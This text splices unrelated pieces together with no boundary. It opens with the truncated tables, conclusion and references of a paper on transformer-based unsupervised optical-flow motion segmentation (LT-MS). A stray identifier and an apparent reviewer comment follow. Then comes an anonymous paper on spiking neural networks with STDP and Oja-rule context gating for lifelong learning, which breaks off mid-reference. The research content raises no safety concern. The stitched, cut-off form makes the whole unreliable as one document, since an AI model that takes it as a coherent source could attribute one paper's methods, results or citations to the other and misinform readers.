| 70.7 | 55.5 | | MoSeg (35) | | | 68.3 | 66.1 | 58.6 | | FTS (25) | | | 55.8 | - | 47.8 | | TIS$_0$ (10) | | | 56.2 | 45.6 | - | | OCLR* (33) (flow only) | | | 72.1 | - | 67.6 | | GWM (6) | | RGB (Flow in loss) | 79.5 | - | 78.3 | | RCF (16) | | | 80.9 | - | 76.7 | | AMD (17) | | | 57.8 | - | 57.0 | | MOD (8) | | | 73.9 | - | 62.2 | | DivA(4)† (14) | | RGB & Flow | 72.4 | - | 64.6 | | TIS$_s$ (10) | | | 62.6 | 59.6 | - | | CIS - No Post (36) | | | 59.2 | - | 45.6 | | CIS - With Post (36) | | | 71.5 | - | 62.0 | Table 3: Multi-segment evaluation. Regarding DAVIS2017-motion, $J \& F$ is the mean of the two. Evaluation is performed on the video as a whole according to the official DAVIS2017 scheme. Reported scores are the average of the individual video scores. *See caption of Table 2. For FBMS59, the two evaluation metrics are bootstrap IoU (bIoU) (14) where each ground-truth mask is mapped to the most likely predicted segment (performed at the frame level), and linear assignment that is a bilinear mapping between the ground-truth and the predicted segments at the sequence level (similar to the official DAVIS2017 evaluation). | Dataset | DAVIS2017-motion | FBMS59 | |------------------|-------------------|--------| | Method / Scores | $J \& F$ ↑ | $J$ ↑ | $F$ ↑ | bIoU | Linear Assignment | | **Ours LT-MS-K3** | 42.2 | 39.3 | 45.0 | 58.4 | 47.2 | | ST-MS (22) | 42.0 | 38.8 | 45.2 | - | - | | MoSeg (35) | 35.8 | 38.4 | 33.2 | - | - | | OCLR* (33) | 55.1 | 54.5 | 55.7 | - | - | | DivA (14) | - | - | - | 42.0 | - | network on the DAVIS2016 training set with now three masks ($K = 3$). The resulting performance on DAVIS2017-motion is slightly better than ST-MS (22), and far better than MoSeg. There is still the same remark about OCLR status as an unsupervised method. Regarding FBMS59, we report multimask segmentation results with two different metrics. Our LT-MS method outperforms by a large margin DivA (14) that attempted this multi-segment evaluation on FBMS59. 5.4 Qualitative Visual Evaluation Fig.3 contains several visual results to demonstrate how our LT-MS method behaves on different situations. We display three result samples obtained on different videos of the benchmarks. Additional results are provided in the Appendix. We can observe that the motion segments are globally accurate. Since our method involves several masks, we can properly handle articulated motions (people2, bmx), deal with the presence of several moving objects in the scene (people2), separate Figure 3: Results obtained with our LT-MS-K4 method ($K = 4$). Three groups of results are displayed, motocross-jump from DAVIS2016, people02 from FBMS59 and bmx from SegTrackV2. For each group, the first row samples successive flow fields (HSV color code) corresponding to the processed video. The second row contains the corresponding images of the video, where the ground-truth of the moving object is overlaid in yellow (when available at that frame). The third row shows the motion segments provided by our LT-MS-K4 method with one colour per segment. For all the results, we adopt the same color set for the three masks corresponding to the moving objects (blue, red and orange), and we let the background image for the background mask. the rider from the bike or motorbike (bmx, motocross-jump), or accommodate motion parallax. Since our method enforces temporal consistency, it can also deal with errors in optical flow estimation or with objects that momentarily stop moving (bmx). We must keep in mind that our actual target is the optical-flow segmentation (OFS) task, even if we evaluate our method on VOS benchmarks. When VOS benchmarks deal with the segmentation of one primary object moving in the foreground, it may occur discrepancies with OFS, which negatively impacts the evaluation scores. The segmentation of additional parts, which appears wrong w.r.t. VOS ground truth, on the contrary makes sense from the OFS standpoint. 6 CONCLUSION We have designed an original transformer-based unsupervised method for segmenting multiple motions over a video in one go. Our LT-MS method leverages the ELBO framework for the loss function, and fully acknowledges the temporal dimension of the motion segmentation problem. Indeed, to the best of our knowledge, our method is the first unsupervised network-based OFS method explicitly leading to a stable and consistent OF segmentation throughout long video sequences. It introduces at training time, on one hand, B-splines spatio-temporal parametric motion models over space-time volumes, and on the other hand, a loss term expressing temporal consistency over successive masks while taking care of occlusions. Our transformer-based network can be applied at test time to input volumes of any time length. It can accommodate different choices on the number $K$ of masks with a simple finetuning step. Experimental results on several datasets demonstrate the efficiency and the accuracy of our LT-MS method by providing competitive results on several datasets. In addition, it is very fast at test time. In future work, we will investigate the slot attention mechanism to modify the number of masks at test time without retraining the model. REFERENCES [1] G.K. Batchelor. *An introduction to fluid dynamics*. Cambridge University Press, 1967. [2] D.J. Butler, J. Wulff, G.B. Stanley, and M.J. Black. A naturalistic open source movie for optical flow evaluation, In *European Conference on Computer Vision (ECCV)*, 2012. [3] M. Caron, H. Touvron, I. Misra, H. Jégou, J. Mairal, P. Bojanowski, and A. Joulin. Emerging properties in self-supervised vision transformers. In *International Conference on Computer Vision (ICCV)*, October 2021. [4] B. Cheng, A. G. Schwing, and A. Kirillov. Per-pixel classification is not all you need for semantic segmentation. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021. [5] J. Cheng, Y.-H. Tsai, S. Wang, and M.-H. Yang. Segflow: Joint learning for video object segmentation and optical flow. In *International Conference on Computer Vision (ICCV)*, Venice, 2017. [6] S. Choudhury, L. Karazija, I. Laina, A. Vedaldi, and C. Rupprecht. Guess what moves: Unsupervised video and image segmentation by anticipating motion. *British Machine Vision Conference (BMVC)*, London, 2022. [7] A. Dave, P. Tokmakov, and D. Ramanan. Towards segmenting anything that moves. In *Int. Conference on Computer Vision Workshops (ICCVW)*, Seoul, 2019. [8] S. Ding, W. Xie, Y. Chen, R. Qian, X. Zhang, H. Xiong, and Q. Tian. Motion-inductive self-supervised object discovery in videos. *arxiv.org/abs/2210.00221*, October 2022. [9] B. Duke, A. Ahmed, C. Wolf, P. Aarabi, and G. W. Taylor. SSTVOS: Sparse spatiotemporal transformers for video object segmentation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, 2021. [10] B. Griffin and J. Corso. Tukey-inspired video object segmentation. In *IEEE Winter Conference on Applications of Computer Vision (WACV)*, Waikoloa Village, January 2019. [11] K. Han, Y. Wang, H. Chen, X. Chen, J. Guo, Z. Liu, Y. Tang, A. Xiao, C. Xu, Y. Xu, Z. Yang, Y. Zhang, and D. Tao. A survey on vision transformer. *IEEE Transactions on Pattern Analysis and Machine Intelligence*, 45(1):87-110, January 2023. [12] S.D. Jain, B. Xiong, and K. Grauman. FusionSeg: Learning to combine motion and appearance for fully automatic segmentation of generic objects in videos. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Honolulu, 2017. [13] D.P. Kingma and M. Welling. An introduction to variational autoencoders. *Foundations and Trends in Machine Learning*, 12(4):307-392, 2019. [14] D. Lao, Z. Hu, F. Locatello, Y. Yang, and S. Soatto. Divided attention: Unsupervised multi-object discovery with contextually separated slots. *arXiv:2304.01430*, April 2023. [15] F. Li, T. Kim, A. Humayun, D. Tsai, and J. M. Rehg. Video segmentation by tracking many figure-ground segments. In *International Conference on Computer Vision (ICCV)*, Sydney, 2013. [16] L. Lian, Z. Wu, S. X. Yu. Bootstrapping objectness from videos by relaxed common fate and visual grouping *Conference on Computer Vision and Pattern Recognition*, Vancouver, June 2023. [17] R. Liu, Z. Wu, S. X. Yu, and S. Lin. The Emergence of objectness: Learning zero-shot segmentation from videos. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2021. [18] F. Locatello, D. Weissenborn, T. Unterthiner, A. Mahendran, G. Heigold, J. Uszkoreit, A. Dosovitskiy, and T. Kipf. Object-centric learning with slot attention. In *Conference on Neural Information Processing Systems (NeurIPS)*, 2020. [19] J. Mattheus, H. Grobler, and A. M. Abu-Mahfouzl. A review of motion segmentation: Approaches and major challenges. *International Multidisciplinary Information Technology and Engineering Conference (IMITEC)*, November 2020. [20] N. Mayer, E. Ilg, P. Häusser, P. Fischer, D. Cremers, A. Dosovitskiy and T. Brox. A large dataset to train convolutional networks for disparity, optical flow, and scene flow estimation. In *Conference on Computer Vision and Pattern Recognition (CVPR)*, Las Vegas, June 2016.
tzlGWqRA0T
For example, while “contextual signals” is mentioned and later modeled, the reader can’t know what that means with respect to this experiment without an initial explanation of the experimental setup and task(s)
SNN-LPCG: Spiking Neural Networks with Local Plasticity Context Gating for Lifelong Learning Anonymous authors Paper under double-blind review Abstract Humans learn multiple tasks in succession with minimal mutual interference, through the context gating mechanism in the prefrontal cortex (PFC). The brain-inspired models of spiking neural networks (SNNs) have drawn massive attention for their energy efficiency and biological plausibility. To overcome catastrophic forgetting when learning multiple tasks in sequence, current SNNs for lifelong learning focus on memory reserving or regularization-based modification, while ignoring the cognitive control behavior in the brain. Inspired by biological context-dependent gating mechanisms found in PFC, we propose SNNs with context gating trained by the local plasticity rule (SNN-LPCG) for lifelong learning. The iterative training between global and local plasticity for task units is designed to strengthen the connections between task neurons and hidden neurons and preserve the multi-task relevant information. The experiments show that the proposed model is effective in maintaining the past learning experience and has better task-selectivity than other methods during lifelong learning. Our results provide new insights that the SNN-LPCG model is able to extend context gating with good scalability on different SNN architectures. Thus, our models have good potential for parallel implementation on neuromorphic hardware for real-life tasks. 1 Introduction The human brain can encode and preserve new memories continuously without disrupting previously acquired memories, that is, the ability of lifelong learning. It is believed that the primate prefrontal cortex (PFC) associates the cognitive control of selecting context-appropriate tasks and executing with minimal interference by gating task-irrelevant input dimensions [Miller et al., 2001; Flesch et al., 2022]. However, it remains unclear how synaptic plasticity induced by past experiences of old tasks is maintained when receiving new experiences of new tasks. Inspired by spike computation, network organization, and plasticity learning in the brain, Spiking neural networks (SNNs) have exclusive advantages in energy efficiency and biological plausibility computation [Xu et al., 2022]. However, affected by catastrophic forgetting, most of the current SNNs agents often need to learn samples of all tasks in a randomly mixed way to learn new tasks [Zhang et al., 2018; Xu et al., 2021], which is quite different from human multi-task lifelong learning. Hence, we aim to explore the possible solution to implement the lifelong learning of SNNs with context gating induced by synaptic plasticity, to model human “cognitive control” behavior while minimizing the intervention of artificial inference. The most essential points in lifelong learning are the capability to perform competitively on the previous task after learning on the subsequently observed dataset. However, the vanilla SNNs trained with surrogate gradient fail to learn multiple tasks in sequence without suffering from catastrophic forgetting, in which the performance decreases sharply on previously encountered tasks after learning new ones. To overcome that problem, the SNNs for lifelong learning have been proposed such as memory reserving [Mozafari et al., 2019], regularization-based method [Skatchkovsky et al., 2022], or reward-based method [Allred & Roy, 2020]. But these models ignore the intrinsic property of cognitive control behavior when proceeding with lifelong learning in the brain. In this paper, our goal is to implement the context gating by the local synaptic plasticity to solve the lifelong learning for SNNs and explore whether SNNs could help understand and implement lifelong learning like the human brain. To this end, we develop single-spike and multi-spike SNN-LPCG and train them with human “cognitive control” experimental samples and analyze the influence of local plasticity on the performance of the model and the possible reason behind it. The contributions are as follows: - The SNNs with context gating learned by local plasticity (SNN-LPCG) framework is proposed for lifelong learning, which can alleviate catastrophic forgetting to a certain extent via local plasticity induced context gating instead of manual weight updating fixation or the samples had been learned. - The single-spike and multi-spike SNN-LPCG models are implemented with the local spike-timing-dependent plasticity (STDP) and Oja learning rules. The iterative training between global backpropagation and local plasticity is designed to strengthen the connections between task neurons and hidden neurons to preserve the multi-task relevant information. - The experiments are conducted to analyze the reason for the effectiveness of local plasticity context gating during SNNs’ lifelong learning. Besides, the performance of the proposed model is compared with the characteristics of human behavior in the cognitive experiments. The results suggest that the above two show a considerate degree of consistency. Moreover, the proposed model shows prior biological plausibility of task neurons’ selectivity in neural dynamics. 2 RELATED WORKS Lifelong learning aims to remember previously trained old tasks and acquire new knowledge by training new tasks. The direct trained SNNs models suffer from the catastrophic forgetting problem when proceeding with multiple-task continuous training. Different approaches have been developed to overcome catastrophic forgetting. The regularization method preserves synaptic connections that are deemed to be essential to consolidate previous knowledge. Considering the synaptic noise and Langevin dynamics, the regularization-based method for SNNs in Antonov et al. (2022) determines the importance of synaptic weights by stochastic Langevin dynamics with local STDP instead of gradient. Based on Bayesian, each synaptic weight is represented by parameters that quantify the current epistemic uncertainty resulting from prior knowledge and observed data. The proposed online rules update the distribution parameters in a streaming fashion as data are observed Skatchkovsky et al. (2022). Memory replay indicates that maintaining representative samples or anchors with the key features of previous tasks as episodic memory promotes lifelong learning. The SNNs trained by R-STDP eliminate catastrophic forgetting with small episodic memory in Mozafari et al. (2019). The cortical connections between excitatory neurons are plastic and regulated by STDP. The results show that sleep is able to prevent catastrophic forgetting through spontaneous reactivation (replay) of both old and new memory traces. Other lifelong learning methods of SNNs are proposed based on the observed neuroscience mechanisms. Inspired by the dopamine signals in mammalian brains, the controlled forgetting network model is introduced to address the stability-plasticity dilemma with local STDP learning to control the forgetting process and reduce the accuracy degradation on new tasks Allred & Roy (2020). Especially, context gating has been suggested to be effective in supporting lifelong learning. For instance, inspired by that neuron in PFC codes for specific tasks and exert top-down control to prioritize context-appropriate stimuli and action, the context-dependent gating signal along with the input is introduced to guarantee that only sparse, mostly non-overlapping patterns of neurons are active for each task in Masse et al. (2018). In this method, between 80% and 86.7% of hidden units are gated on the MNIST dataset for peaked classification accuracy. The optimal gated unit numbers depend on the network complexity and task numbers and need to be tuned by parameter validation. However, since the neurons in PFC code for specific tasks and exert top-down control to prioritize context-appropriate stimuli and actions, these methods ignore the dynamic task selectivity of neuron populations during the cognitive control process. Figure 1: The framework of the network construction of the single-spike SNN-LPCG and multi-spike SNN-LPCG. (Top) Two different kinds of learning regimes: blocked and interleaved regimes. Human learn better under a blocked curriculum when tasks are not similar. (left bottom) The network structure of single-spike SNN-LPCG. The first encoding layer codes the input stimuli into spike trains and avoids weak signal ignorance. The additional context signals of tasks are introduced into the second layer. The iterative training between the global and local plasticity proceeds during the training process, in which all the synaptic weights are updated by the global backpropagation rule, and the weights of the context signal are updated by the local plasticity rule. (right bottom) The network structure of multi-spike SNN-LPCG. The network is a simple feed-forward MLP with two hidden layers with IF spiking neurons that receive the pixels information of pictures together with the one-hot contextual signal as input. And the connections between the contextual cue and the first layer will be successively updated by the Hebbian learning rule. (right bottom) shows the blocked and interleaved distribution of the two tasks’ samples. 3 METHODS In this paper, we aim to explore the possibility of applying local plasticity, which can enhance the connection between context input and corresponding activated dendritic segments, to make SNNs achieve the effect of lifelong continued learning. As mentioned earlier, it is generally believed that human “cognitive control” is closely related to PFC. There is evidence that PFC can prioritize context-appropriate stimuli and actions through top-down control. In some past continued learning work, such as Duncker et al. (2020) and Zeng et al. (2019), the gated parameters are mostly updated by human coding or fixation, which lacks biological plausibility. Based on these considerations, we choose the spiking model as the basic framework for the design and construction of the target networks. The data from relevant cognitive experiments followed by Flesch et al. (2018) (Supplementary material for details) is used to analyze and evaluate the modeling ability and performance of the proposed model. 3.1 NETWORK ARCHITECTURE In the above experiment, participants need to classify the input stimuli according to the given task rules. We model this behavior as three-layer MLP spiking-neural networks, in which the main part of the network is used to receive pictures stimuli and output results, while the contextual signals are encoded by one-hot labels and then input into the network so as to affect the network’s judgment. And we use local plasticity to enforce the connection between the context inputs and relevant characters. Based on different spike coding methods, we develop SNN-LPCG based on two different kinds of SNNs, multi-spike SNNs trained with the surrogate gradient and single-spike SNNs with direct backpropagation. Both SNNs use stochastic gradient descent (SGD) algorithms to train on blocked or interleaved data. Once a supervised training step is finished, the network will follow a step (some trials more than one) of local plastic learning. ### 3.1.1 Single-Spike SNN-LPCG We employ the basic SNNs models in Mostafa (2018), where each neuron is permitted to fire only once. The non-Leaky IF neuron model is utilized for its simplicity and efficiency. The membrane potential of each postsynaptic neuron \( j \) is obtained after integrating the contributions of all the weighted presynaptic neurons of \( N_I \): \[ V_j(t) = \sum_{i=1}^{N_I} g(t - t_i)w_{ij}(1 - \exp(-(t - t_i))), \] where \( g(x) \) denotes the Heaviside function, which equals zero for negative arguments of \( x \), otherwise equals to be one for positive ones. \( t_i \) indicates the concrete firing time of presynaptic neuron \( i \). Thus, the presynaptic neuron \( i \) would transmit the corresponding postsynaptic potential to neuron \( j \) only if it satisfies \( t_i < t \); otherwise, that potential vanishes. The postsynaptic neuron \( j \) emits a spike when its membrane potential crosses the threshold \( V_{th} \) which is set to 1. Due to each neuron being permitted to fire only once, the spike firing times \( t_j \) is transformed to \( z \)-domain by \( \exp(t_j) \rightarrow z_j \) to simplify implementation. Meanwhile, the casual set \( C_j = \{ i : t_i < t_j \} \) is defined as the collections of the presynaptic spikes that determine the time point at which the postsynaptic neuron fires the first spike. Since then, the firing times of each neuron can be computed sequentially over the feedforward process through the above formulations. In the experimental process, we find that directly using the single-spike structure in Mostafa (2018) is easy to make the network ignore the relatively weak signal (that is, the darker pixels) in the source visual stimulus. Therefore, we apply an MLP structure at the first layer, which is used to extract the features of the source image. The hidden layer then encodes the extracted features (the value is limited by implementing a sigmoid function) together with the contextual signal according to their signal strength for forward propagation. Besides, to strengthen the difference in STDP’s influence on different synapses, we try to encode the stronger contextual signal with the same intensity as the strongest signals on the hidden layer during Hebbian updating. We also adjust the number of weight updating of global plasticity and local plasticity in a round in order to coordinate the strength between them. **Context gates by STDP.** The local plasticity of STDP is a reasonably well-established physiological mechanism of activity-drive synaptic regulation based on the local adjacent neurons. And it has been observed extensively in vitro for more than a decade Feldman (2000), and it is believed to play an important role in neural activity Masquelier et al. (2009). \[ \Delta W_{ij}^{\text{stdp}} = \begin{cases} A_+\exp\left(\frac{t_j-t_i}{\tau^+}\right), & \text{if } t_j > t_i, \\ A_-\exp\left(\frac{t_i-t_j}{\tau^-}\right), & \text{if } t_j < t_i, \end{cases} \] where \( A_+, A_- \) and \( \tau^+, \tau^- \) indicate the magnitudes and time constants, respectively. Thus, the \( w_{ij} \) is updated by \( w_{ij} = w_{ij} + \lambda_{\text{stdp}} * \Delta W_{ij}^{\text{stdp}} \). **Loss function** Since the modeled behavior is a binary classification task, we use a simplified cross-entropy to calculate the loss. Besides, we multiply the loss value by the reward value as the participants would receive the numerical reward after their decision in cognitive experiments. \[ L_{\text{single}} = -r \times \frac{\exp(-o_0)}{\exp(-o_0) + \exp(-o_1)}, \] where \( r \) is the corresponding numerical rewards of the trials, \( o_0, o_1 \) is the spike latency of the last layers. 3.1.2 Multi-spike SNN-LPCG The global training of the multi-spike SNN-LPCG model is implemented based on spatiotemporal backpropagation (STBP) algorithm in Wu et al. (2018). The iterative integrate-and-fire (IF) neuron is employed to express neuronal dynamics both in the spatial domain and temporal domain. According to the integrated presynaptic neuron input \( I(t) \) and the membrane potential at \( t - 1 \), the membrane potential of postsynaptic neuron \( j \) at \( t \) can be computed as: \[ u_i(t + 1, n) = u_i(t, n) + x_i(t + 1, n) + b_i, \] \[ x_i^{t+1,n} = \sum_{j=1}^{l(n-1)} w_{ij}^n o_j^{t+1,n-1}, \] \[ o_i^{t+1,n} = g(u_i^{t+1,n} - V_{th}), \] The Heaviside function of \( g(x) \) is to guarantee that the spike fires once the membrane potential cross over the threshold \( V_{th} \). Then, the surrogate gradient of \( g(x) \) is approximated based on the derivative of spike activities of \( g'(x) = \frac{\alpha}{2(1+(\frac{x}{\alpha})^2)} \), to solve the non-differential problem of discrete spikes firing behavior, where \( \alpha \) is set to be 2.0. Based on the above formulation and the gradient computing in Wu et al. (2018), the update of synaptic weights can be obtained by the gradient descent rules. During experiments, we find that the effect of STDP learning rules in the multi-spike model was very meaningless. We infer that this result might be due to the fact that the positive contextual signal is powerful and is encoded to a relatively high frequency in the multi-spike network. Thus, the local plasticity learned by STDP becomes unstable, which makes STDP rules difficult to assist the network to distinguish functional neurons. Therefore, we don’t apply STDP rule to multi-spike model as the local plasticity rule. Oja rules. Inspired by Flesch et al. (2022), we use Oja’s rule (Oja, 1982), which can regularize the weight based on Hebbian learning, to constrain the parameters. \[ w = w + \eta_{hebb} (x - wy), \] where \( \eta_{hebb} \) is the learning rate of the Hebbian update, \( x \) is the inputs and \( y \) is the linear hidden units output connected to the inputs \( x \) via weight matrix \( w \). Sluggish neurons. According to the ordinary cognition and the conclusion from experiments of human volunteers Flesch et al. (2018), Humans usually can learn tasks better after blocked training than interleaved training, while the artificial neural network is usually on the contrary. Inspired by Flesch et al. (2022), we apply the “sluggish” neurons to model the human’s learning bias under interleaved training. That is, when learning in interleaved mode, the relation between the context cues and stimuli of the former samples may interfere with the judgment of the current sample. The sluggish neurons will carry the information from previous samples. By simply using Hebbian learning rules and SNNs, we can not only achieve basic cognitive control in the blocked learning regime but also have higher task-specific neural codes because of the detailed neural dynamics compared with artificial neural networks. 4 RESULTS In this section, we will conduct several experiments to validate the effectiveness and the biological plausibility of our method. The grid search is employed to find suitable parameters for each model. The final results are obtained by running the network over three times and taking the average results for comparison. Figure 2: (A) The accuracy curve of single-spike SNN-LPCG. (left) Vanilla network of single-spike SNN. (mid) vanilla network with STDP learning rules. (right) vanilla network with multiple STDP update. (B) (left top) The target choice of the given data. (other) Plotting the choice of the trained network with (right top) vanilla setting, (left bottom) STDP learning rules, and (right bottom) multiple STDP updating. (C) (left top) The average absolute values of weights related to the context signal input and other weights in the hidden layer of three networks. (other) The time difference of spiking time of hidden layer neurons of a trained network under two different contextual signals. They are vanilla networks (right top), networks with STDP learning rules (left bottom), and networks with multiple STDP updating (right bottom). 4.1 THE EFFECTIVENESS OF SINGLE-SPIKE SNN-LPCG LOCAL PLASTICITY WITH STDP We first explore how STDP may take effect during context-dependent task learning. As illustrated in Fig. 2(A), as expected, we note that single-spike SNN is also affected by catastrophic forgetting, and the learning performance of the first task almost immediately drops down. In contrast, when applying STDP learning rule, the decline rate of the first task is restrained to a very slow level, and the performance of the second task can still rapidly increase until convergence to perfect performance. The accuracy of the first task finally stays at about ~75%. In addition, the model with multiple STDP updating seems to have stronger resistance to catastrophic forgetting while its results are relatively unstable. However, although the memory decline decelerates under the effect of STDP, the accuracy curve under the first task becomes even more unstable than the vanilla network. Then we compare the average absolute values of the weights related to the context signal and other weights in the hidden layer of the three models. As shown in Fig. 2(C) (left top), under the influence of STDP learning rule, the absolute value of context-related weight becomes very large. Besides, after training under the blocked data, the time difference of hidden layer neurons’ spike between two tasks is very close (mostly lower than 0.05ms, the largest is only ~0.3ms) and evenly distributed, which makes the choice matrix of the first task almost replaced by that of the second one. In contrast, the hidden layer neurons of the network using STDP learning rules always fire spike under the first task earlier than under the second task, which makes the network distinguish the two independent tasks to a certain extent. Based on these phenomena, we infer that the relatively large weight magnitudes caused by STDP learning rules enable the network to structure some cognition of the past tasks to a certain extent so that it can make correct choices toward relatively strong stimuli after being trained under the second task. This can also be reflected in Fig. 2(B) (down). The choice matrix of the first task smoothly changes along the areas where the choices are consistent under the two tasks. The large magnitude of the weight might also be the main reason for the instability of the accuracy curve in the first task. Though having a certain effect, the stability and the final performance of the model using STDP learning rules in context-dependent tasks are still not satisfactory. The neural dynamics of the brain are constructed by a large group of neural plasticity mechanisms [Churchland et al., 2012; Ahrens et al., 2012; Golub et al., 2018]. The exploration and discovery of single-spike SNN-LPCG might provide some ideas for related research fields. Based on the problems in the single-spike model, we further explore multi-spike SNN-LPCG, which can implement a more stable and better model of human cognitive control behavior, and has better biological plausibility. Figure 3: (A) (upper) the network accuracy change curve of the vanilla blocked training (left), applying OWM learning algorithm on the latter two connections (mid) and our method (right). (bottom left) applying OWM learning algorithm on all the connections. (bottom right) the standard reward value of the whole task and the choice of the trained network in two dimensions under the vanilla blocked training network (left two), the network with OWM applied in the latter two layers (mid two), and the network trained under our method (right two). (B) The impact of the sluggish neurons in context-dependent decision making task. (left top) The accuracy of neural networks trained on interleaved data (left) or blocked data (right) with different levels of “sluggishness”. (right top) the proportion of units in the hidden layer which are task selective (obtained by linear regression). (left bottom) Linear coefficients were obtained from a regression of the output against the models shown in the midden. (mid bottom) The two models are used to model the possible choice of the human. The factorized model means the two features are learned separately while the linear model means the two features are learned chaotically and ignore the context cue. (right bottom) The network output for different levels of sluggishness. 4.2 COMPARED MULTI-SPIKE SNN-LPCG WITH HUMAN MODIFICATION To validate the effectiveness of multi-spike SNN-LPCG, we compare it to other lifelong learning methods under the same setting, such as the regularization-based lifelong learning method of the orthogonal weights modification (OWM) learning algorithm in Zeng et al. [2019]. As shown in Fig. 3(A), in contrast to the vanilla multi-spike model, the lifelong learning models with the OWM algorithm and our multi-spike LPCG perform better on both two tasks, because these models retain the context information learning before a certain extent. Besides, the third network’s performance is much better than the second one while the second model applies more strict constraints on the network connections. It may reveal that excessive human constraint sometimes will impact the network’s ability to retain memory. Moreover, comparing the accuracy curve of the OWM learning algorithm, our multi-spike LPCG method can retain the learned tasks to a greater extent under the same circumstances. Especially, the accuracy curve of our method has almost stopped falling while the curve of the OWM algorithm still shows a downward trend in the last several trials. And on the bottom figure in Fig. 3(A), we can see the detail of the choices made in two dimensions. The vanilla network trained under blocked training almost ignores the task signal, and the OWM model and our SNN-LPCG model can keep the choices learned from the first task. Meanwhile, the network trained with our method can keep more details near the category boundary of the first tasks. 4.3 MODEL THE COGNITIVE CONTROL BEHAVIOR OF HUMAN We conduct experiments to evaluate the effectiveness of the sluggish neurons. In Fig. 3(B), when $\alpha = 0$ it means the network is the same as the vanilla network. Combining the results of Fig. 3(B) (top) and 3(B) (left bottom), we can conclude that as the level of sluggishness increases the performance of the network decreases. At the level of neural dynamic, the proportion of the task-selective hidden layer units, which are active only under specific contextual cues, is also reduced. Meanwhile, the choice matrix of the network under interleaved training becomes more and more like the linear model in Fig. 3(B) (mid bottom) as the sluggishness values become larger. On the other hand, the same statistical data of the network trained in blocked data with local plasticity hardly be affected by sluggishness. Therefore, the “sluggish” neurons are reasonable assumptions. Meanwhile, though the best accuracy obtained by the trained network under interleaved data (without sluggish) is relatively high, the largest proportion is still lower than that of the trained network under blocked data. Then after reasonably modeling the human behavior under interleaved data, we can use our method to try modeling the behavior of the human participants in [Flesch et al., 2018]. And to access the rationality and the biological plausibility of our method, we compare the validation performance and neural dynamics after blocked or interleaved training among the experimental data, the vanilla spiking network, the model proposed in [Flesch et al., 2022], and our method. Firstly, as shown in Fig. 4(A), we can see that participants trained under blocked data perform better than those trained under interleaved data while the vanilla network shows the opposite phenomenon. The model of Flesch et al. (2022) and our model both appear the similarity to human behavior. And participants’ behaviors show the congruency effect during the training period, which means that they perform better on the congruent trail between two tasks than the incongruent trials. This effect is stronger when training in the interleaved data, as shown in Fig. 4(A) (bottom). We can see that the model of Flesch et al. (2022) and our model both reveal such a congruency effect while the vanilla network can’t reproduce such an effect because of the catastrophic forgetting. Then when fitting the psychometric functions (sigmoid) to the choice made by human participants and the other three models (in supplementary Fig.1), we can see that our model and the reference model have relatively steeper slopes for the irrelevant dimension under interleaved training than blocked training as shown in human performance. But the vanilla network obtains steeper slopes for the irrelevant dimension under blocked training because the catastrophic forgetting makes the SGD network more easily affected by the irrelevant feature. A similar result also can be seen in supplementary Fig.1 (bottom). We fit the factorised model and the linear model (shown in Fig. 3(B) (mid bottom)) to the choice of human and three networks. Human participants learned the clear boundary of two tasks/dimensions under blocked data and learned a relatively vague boundary under interleaved data. The reference network and the network with our method can model such characteristics in human behavior while the performance of the vanilla neural network is almost the opposite. In summary, these tests can demonstrate that our method can overcome the catastrophic forgetting of the neural network. And our framework can effectively model human cognitive behavior mode and achieve the similar effect to the framework proposed by Flesch et al. (2022). In addition to the modeling of human behavior patterns, we also compared the neuron dynamics in our framework with theirs, to prove the biological plausibility of our framework. Though the framework in Flesch et al. (2022) exhibits great neuron selectivity in the abstract context-dependent task samples (Gaussian “blobs”) and reaches a relatively great accuracy in trees picture (in Fig. 4(A) (top)). It shows poor task-selectivity in their network when dealing with trees picture. When under blocked training, their network only has a very small proportion of task-selectivity units in the hidden layer (~10%) while in our network a considerable proportion of units is selective to a specific task (~25%). As shown in Fig. 4(B), the number of the units which are only active to the first task even drops to ~ 1%. Besides, we plot the average neural activity of task-selective neurons in Fig. 4(B) (bottom). In our network, the task-selective neurons have a higher spiking frequency than the task-agnostic neurons when facing the corresponding task. The reference network exhibits poor performance on the 1st task-selective neuron’s activity. This phenomenon indicates that our model has better biological plausibility and neural dynamics during human cognitive control. 5 CONCLUSION Affected by catastrophic forgetting, SNNs agents often need to learn samples of all tasks in a randomly mixed way to learn new tasks, which is quite different from human multi-task lifelong learning. Therefore, in this paper, we have extensively explored the role of local synaptic plasticity in context gating of SNNs, which is more biologically plausible, so as to model human “cognitive control” behavior while minimizing the intervention of artificial inference. Taken together, based on the gating in the PFC, we studied and explored whether the known local plasticity rules can promote SNNs to possess the effect of context gating. The single-spike and multi-spike SNNs with context gating trained by local plasticity were implemented. The models we proposed have revealed better effectiveness in maintaining the past learning experience. Besides, we fitted our network to the previously published human behavior data and found that our method can reproduce the human behavior data in both blocked and interleaved data. Moreover, our model indicates prior neural dynamics of task neuron selectivity compared with the previous work. REFERENCES Misha B Ahrens, Jennifer M Li, Michael B Orger, Drew N Robson, Alexander F Schier, Florian Engert, and Ruben Portugues. Brain-wide neuronal dynamics during motor adaptation in zebrafish. *Nature*, 485(7399):471–477, 2012. Jason M Allred and Kaushik Roy. Controlled forgetting: Targeted stimulation and dopaminergic plasticity modulation for unsupervised lifelong learning in spiking neural networks. *Frontiers in neuroscience*, 14:7, 2020. D.I. Antonov, K.V. Sviatov, and S. Sukhov. Continuous learning of spiking networks trained with local rules. *Neural Networks*, 155:512–522, 2022. ISSN 0893-6080. doi: https://doi.org/10.1016/j.neunet.2022.09.003. Mark M Churchland, John P Cunningham, Matthew T Kaufman, Justin D Foster, Paul Nuyujukian, Stephen I Ryu, and Krishna V Shenoy. Neural population dynamics during reaching. *Nature*, 487 (7405):51–56, 2012. Lea Duncker, Laura Driscoll, Krishna V Shenoy, Maneesh Sahani, and David Sussillo. Organizing recurrent network dynamics by task-computation to enable continual learning. *Advances in neural information processing systems*, 33:14387–14397, 2020. D. E. Feldman. Timing-based ltp and ltd at vertical inputs to layer ii/iii pyramidal cells in rat barrel cortex. *Neuron*, 2000. Timo Flesch, Jan Balaguer, Ronald Dekker, Hamed Nili, and Christopher Summerfield. Comparing continual task learning in minds and machines. *Proceedings of the National Academy of Sciences*, 115(44):E10313–E10322, 2018. Timo Flesch, David G Nagy, Andrew Saxe, and Christopher Summerfield. Modelling continual learning in humans with hebbian context gating and exponentially decaying task signals. *arXiv preprint arXiv:2203.11560*, 2022. Matthew D Golub, Patrick T Sadtler, Emily R Oby, Kristin M Quick, Stephen I Ryu, 